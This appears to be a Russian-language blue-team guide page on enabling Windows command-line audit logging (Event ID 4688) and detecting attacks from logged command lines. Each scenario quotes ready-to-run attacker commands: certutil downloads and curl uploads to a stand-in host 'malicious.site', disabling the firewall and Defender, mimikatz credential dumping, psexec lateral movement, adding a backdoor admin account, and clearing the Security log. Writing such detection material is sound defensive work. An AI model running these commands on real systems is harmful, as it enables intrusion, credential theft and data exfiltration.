# Логирование командной строки ### Включение логирования командной строки в события создания процессов Логирование командной строки в событиях создания процессов — это важная функция для мониторинга безопасности, которая позволяет отслеживать, какие команды были выполнены при запуске процессов. 1. Откройте **Редактор групповых политик** 2. Перейдите в раздел: * **Конфигурация компьютера** → **Административные шаблоны** → **Система** → **Аудит процессов**. 3. Включите политику **"Включить аудит командной строки"** После включения этой политики в событиях создания процессов (Event ID 4688) будет добавлена информация о командной строке, которая использовалась для запуска процесса. Это позволяет отслеживать, какие команды выполняются на системе, что помогает обнаруживать подозрительную активность. Обычно правила обнаружения, основанные на паттернах командной строки, не самые надежные и легко обходятся. Но это полезно, когда атакующие применяют системные утилиты для проведения атак. ## Некоторые сценарии обнаружения по артефактам командной строки #### 1. **Загрузка вредоносного ПО с помощью LolBas** * **Описание**: Злоумышленники могут использовать командную строку для загрузки и запуска вредоносных файлов. * **Примеры команд**: ```cmd certutil -urlcache -split -f http://malicious.site/malware.exe C:\Windows\Temp\malware.exe C:\Windows\Temp\malware.exe ``` * **Как обнаружить**: Логирование покажет команды загрузки файлов с помощью утилит, таких как `certutil`, `bitsadmin` или `curl`. {% hint style="info" %} Ну в целом, в целом...\ Только для LOLBas обнаружение по паттернам командной строки является надежным способом обнаружения. \ Для всего остального можно использовать такой подход, но лучше иметь более надежные способы. Про подход к написанию детектирующей логики: [detection-engineering](https://vasilisa-l.gitbook.io/blue-team-cookbook/soc/detection-engineering "mention") {% endhint %} Подборка всех видов LOLbins: *** #### 2. **Обход защиты (Bypass)** * **Описание**: Злоумышленники могут использовать командную строку для отключения антивируса, брандмауэра или других средств защиты. * **Примеры команд**: ```cmd netsh advfirewall set allprofiles state off sc config WinDefend start= disabled ``` * **Как обнаружить**: Логирование покажет команды, связанные с отключением защиты, такие как `netsh`, `sc config`, или `reg add`. *** #### 3. Горизонтальное **перемещение (Lateral Movement)** * **Описание**: Злоумышленники могут использовать командную строку для перемещения по сети, используя утилиты, такие как `psexec`, `wmic` или `schtasks`. * **Примеры команд**: ```cmd psexec \\target-pc -u admin -p password C:\Windows\Temp\malware.exe wmic /node:target-pc process call create "C:\Windows\Temp\malware.exe" ``` * **Как обнаружить**: Логирование покажет команды, связанные с удаленным выполнением кода или перемещением по сети. *** #### 4. **Кража данных (Data Exfiltration)** * **Описание**: Злоумышленники могут использовать командную строку для копирования или отправки данных на внешние серверы. * **Примеры команд**: ```cmd robocopy C:\Documents\Confidential\ \\attacker-server\share curl -F "file=@C:\Documents\Confidential\file.txt" http://malicious.site/upload ``` * **Как обнаружить**: Логирование покажет команды, связанные с копированием или отправкой данных, такие как `robocopy`, `curl` или `ftp`. *** #### 5. **Использование известных утилит для взлома** * **Описание**: Злоумышленники могут использовать известные утилиты, такие как `mimikatz`, для кражи учетных данных или повышения привилегий. * **Примеры команд**: ```cmd mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" ``` * **Как обнаружить**: Логирование покажет запуск подозрительных утилит, таких как `mimikatz`, `procdump` или `pwdump`. *** #### 6. **Создание backdoor-ов** * **Описание**: Злоумышленники могут использовать командную строку для создания backdoor-ов, таких как добавление новых пользователей или настройка удаленного доступа. * **Примеры команд**: ```cmd net user hacker Password123 /add net localgroup administrators hacker /add ``` * **Как обнаружить**: Логирование покажет команды, связанные с созданием пользователей или изменением групп. *** #### 7. **Атаки на Active Directory** * **Описание**: Злоумышленники могут использовать командную строку для атак на Active Directory. Или для разведки. * **Примеры команд**: ```cmd dsquery user -name admin net user /domain ``` * **Как обнаружить**: Логирование покажет команды, связанные с Active Directory, такие как `dsquery`, `net user /domain` и другие. *** #### 8. **Скрытие следов (Anti-Forensics)** * **Описание**: Злоумышленники могут использовать командную строку для удаления логов или скрытия своей активности. * **Примеры команд**: ```cmd wevtutil cl Security del C:\Windows\Temp\malware.exe ``` * **Как обнаружить**: Логирование покажет команды, связанные с удалением логов или файлов, такие как `wevtutil`, `del` или `rm`. *** #### 9. **Атаки на реестр** * **Описание**: Злоумышленники могут использовать командную строку для изменения реестра, например, для добавления автозагрузки. * **Примеры команд**: ```cmd reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Malware /t REG_SZ /d "C:\Windows\Temp\malware.exe" ``` * **Как обнаружить**: Логирование покажет команды, связанные с изменением реестра, такие как `reg add` или `reg delete`. [registry](https://vasilisa-l.gitbook.io/blue-team-cookbook/windows/registry "mention") *** #### 10. **Атаки на сетевые ресурсы** * **Описание**: Злоумышленники могут использовать командную строку для сканирования сети или атак на сетевые ресурсы. * **Примеры команд**: ```cmd ping 192.168.1.1 net view \\target-pc ``` * **Как обнаружить**: Логирование покажет команды, связанные с сетевыми утилитами, такими как `ping`, `net view` или `nmap`. *** {% hint style="info" %} Несмотря на то, что такие правила обнаружения легко обойти, они всегда приминимы для обнаружения LolBas. {% endhint %} Для многих из описанных случаев, регистрируются и другие события, например Event ID 4720 (создание пользователя) или Sysmon 13 (изменение параметра реестра). \ Используйте гибридный подход для обнаружения любых аномалий в вашей сети.